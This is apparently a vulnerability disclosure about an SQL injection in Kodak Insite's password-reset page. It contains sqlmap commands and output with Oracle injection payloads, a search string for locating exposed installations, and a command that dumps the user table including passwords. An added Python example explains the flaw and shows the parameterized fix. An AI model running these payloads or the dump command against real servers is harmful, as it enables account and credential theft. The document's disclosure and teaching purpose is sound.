While investigating a recent installation of Kodak's Insite Creative Workflow System for my current employer, I found an SQL injection vulnerability in its "Forgot Your Password?" page (EmailPassword.asp).
An example of this application can be seen on the Kodak site.
Many other copies of Kodak Insite can be located with any search engine by looking for the string "insite creative login".
Our installation was set up on an internal site, so sqlmap was run against our local copy as follows.
sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' -p user_name --risk=3 --level=5 -o
sqlmap identified the following injection points with a total of 163 HTTP(s) requests:
---
Place: POST
Parameter: user_name
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: user_name=1') AND 5065=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)||CHR(110)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5065=5065) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(121)||CHR(112)||CHR(58)||CHR(62))) FROM DUAL) AND ('yCTb'='yCTb&Language=en

    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: user_name=-2979') OR 1635=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(80)||CHR(114)||CHR(122),5) AND ('NjHU'='NjHU&Language=en
---
[11:52:56] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[11:52:56] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 44 times
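The sqlmap output above tells us two things worth reading off directly. The payloads open with 1') and close with AND ('yCTb'='yCTb, so the submitted user name is being dropped inside a single-quoted, parenthesised comparison (something of the form WHERE (user_name = '<input>')), and the error-based payload is a CHR()-chain that Oracle is asked to parse as XML so that the result leaks in the error text. The following is an added example, not code from the original post or from Kodak's product: it reconstructs that query shape with sqlite3 standing in for Oracle (so only the quoting and boundary logic carries over, not XMLType or DBMS_PIPE), contrasts string concatenation with a bound parameter, and decodes the CHR() chains from the payloads. The column layout and rows of DBCS_REMOTEUSER are assumed and constructed; the real table's columns are not shown in the post.

```python
"""Added example (not from the post or from Kodak): the query shape sqlmap's
boundary  1') ... AND ('x'='x  implies, concatenated vs. parameterized, plus a
decoder for the CHR()||CHR() chains in the Oracle payloads."""
import re
import sqlite3

# Constructed sample rows standing in for PRINERGY.DBCS_REMOTEUSER; the real
# column names are assumed, the post only names the table.
SAMPLE_USERS = [
    ("alice", "alice@example.com", "s3cret"),
    ("bob", "bob@example.com", "hunter2"),
]


def make_db():
    """In-memory sqlite3 database playing the role of the Oracle back end."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE DBCS_REMOTEUSER (user_name TEXT, email TEXT, password TEXT)"
    )
    con.executemany("INSERT INTO DBCS_REMOTEUSER VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def lookup_vulnerable(con, user_name):
    """Builds the WHERE clause by concatenation: the pattern the payload exploits.
    The parenthesised, single-quoted comparison matches the 1') ... ('x'='x
    boundary sqlmap reported."""
    sql = (
        "SELECT user_name, email, password FROM DBCS_REMOTEUSER "
        "WHERE (user_name = '" + user_name + "')"
    )
    return con.execute(sql).fetchall()


def lookup_parameterized(con, user_name):
    """Same query with the value bound as a parameter; input cannot alter the SQL."""
    sql = (
        "SELECT user_name, email, password FROM DBCS_REMOTEUSER "
        "WHERE (user_name = ?)"
    )
    return con.execute(sql, (user_name,)).fetchall()


# Boolean payload in the same boundary form sqlmap used: close the literal and
# the parenthesis, OR in a tautology, then re-open a quote so the original
# query's trailing ') still parses.
TAUTOLOGY = "1') OR ('a'='a"


def demo():
    """Returns (rows for a legitimate user, rows leaked by the tautology through
    the concatenated query, rows returned for the same input when bound)."""
    con = make_db()
    legit = lookup_vulnerable(con, "alice")
    leaked = lookup_vulnerable(con, TAUTOLOGY)
    safe = lookup_parameterized(con, TAUTOLOGY)
    return len(legit), len(leaked), len(safe)


def decode_chr_chain(fragment):
    """Decodes a CHR(n)||CHR(n)||... Oracle expression into text, keeping any
    non-CHR piece (such as the CASE subselect) as a {placeholder}.  Applied to
    the XMLType payload above it yields <:vne:{...}:typ:>, i.e. Oracle is made
    to parse a deliberately malformed XML fragment whose middle is the 1/0
    result, so the ORA-/LPX- error message echoes the answer back."""
    out = []
    for piece in fragment.split("||"):
        m = re.fullmatch(r"\s*CHR\((\d+)\)\s*", piece)
        out.append(chr(int(m.group(1))) if m else "{" + piece.strip() + "}")
    return "".join(out)


if __name__ == "__main__":
    print(demo())
    print(decode_chr_chain("CHR(76)||CHR(80)||CHR(114)||CHR(122)"))
```

Run it and the concatenated lookup returns every row for the tautology while the bound version returns none for the same input; the time-based payload's CHR() chain decodes to the arbitrary pipe name sqlmap passes to DBMS_PIPE.RECEIVE_MESSAGE, whose second argument (5) is the wait in seconds that produces the measurable delay.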
A little further enumeration shows that the complete user table, usernames and passwords included, can be dumped like this:
sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' --risk=3 --level=5 -o -D PRINERGY -T DBCS_REMOTEUSER --columns --dump
Supposedly Kodak will be releasing a fix in September.